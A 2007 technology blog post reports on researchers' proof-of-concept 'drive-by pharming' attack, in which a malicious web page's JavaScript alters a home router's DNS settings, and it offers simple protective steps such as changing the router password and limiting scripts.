[Geeks are Sexy] technology news

Friday, February 23, 2007

Drive-by Pharming Alert

It has recently hit the news that a few clever researchers have put together a rather clever and potentially devastating pharming attack aimed at consumer-level wireless routers. All that's required for a router to be "Drive-by Pharmed" is to have a user connected behind that router to visit a special evil webpage.

First, the attacker creates a web page containing a simple piece of malicious JavaScript code. When the page is viewed, the code makes a login attempt into the user's home broadband router, and then attempts to change its DNS server settings to point to an attacker-controlled DNS server. Once the user's machine receives the updated DNS settings from the router (after the machine is rebooted) future DNS requests are made to and resolved by the attacker's DNS server.

And then the attacker basically owns the victim's web connection.

In other words, once the attack has done its work, any browser on your network can be silently redirected to any site (legitimate or otherwise) that the attacker wishes. The browser or OS you happen to be using doesn't matter.

Apparently there are at least 77 Cisco devices that are vulnerable to this (for now) proof-of-concept attack. Symentec has a nice article detailing the mechanics of the attack, as well as nifty flash video for those who don't feel like reading. Suffice it to say, it would be a very bad thing for this attack to start cropping up in the wild. However, there are some very simple and relatively easy steps that everyone can take to protect themselves.

  • Change your router's password. There is no excuse not to. Seriously.
  • Browse with scripting disabled. And since javascript is needed for many legitimate uses, solutions like the NoScript Extension for Firefox are worth investigating.
  • Don't browse recklessly. Yes, I know those shady corners of the Internet are loads of fun, but they aren't worth getting your computer "totally pwned". Just be careful and use some common sense when clicking around.
Via Schneier.


Post a Comment

Links to this post:

Create a Link

<< Home